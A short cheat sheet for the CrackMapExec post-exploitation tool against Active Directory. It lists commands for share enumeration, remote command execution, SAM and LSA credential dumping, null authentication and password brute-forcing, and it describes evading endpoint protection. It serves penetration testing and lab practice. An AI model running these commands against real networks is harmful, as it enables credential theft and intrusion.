CrackMapExec

Description

CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve it's functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.

Protocols

{smb,ftp,ssh,rdp,ldap,mssql,winrm}
    smb                 own stuff using SMB
    ftp                 own stuff using FTP
    ssh                 own stuff using SSH
    rdp                 own stuff using RDP
    ldap                own stuff using LDAP
    mssql               own stuff using MSSQL
    winrm               own stuff using WINRM

Usage

Get InformationsList SharesDump SharesPassword PolicyRemote Command ExecutionDump SAMDump LSA

cme smb 10.10.10.10

cme smb 10.10.10.10 -u 'qu35t' -p 'Passw0rd!' --shares

cme smb 10.10.10.10 -u 'qu35t' -p 'Passw0rd!' --shares -M spider_plus

cme smb 10.10.10.10 --pass-pol

cme smb 10.10.10.10 -u Administrator -p 'Password1!' -x whoami

cme smb 10.10.10.10 -u Administrator -p 'Password1!' --sam

cme smb 10.10.10.10 -u Administrator -p 'Password1!' --lsa

Authentication

Null AuthenticationBruteforce UsersBruteforce passwords

cme smb 10.10.10.10 -u '' -p ''

cme smb 10.10.10.10 -u users.txt -p 'Passw0rd!' --continue-on-success

cme smb 10.10.10.10 -u 'qu35t' -p passwords.txt --continue-on-success

References

• Github - Official
• Ippsec - PivotAPI
• Ippsec - Forest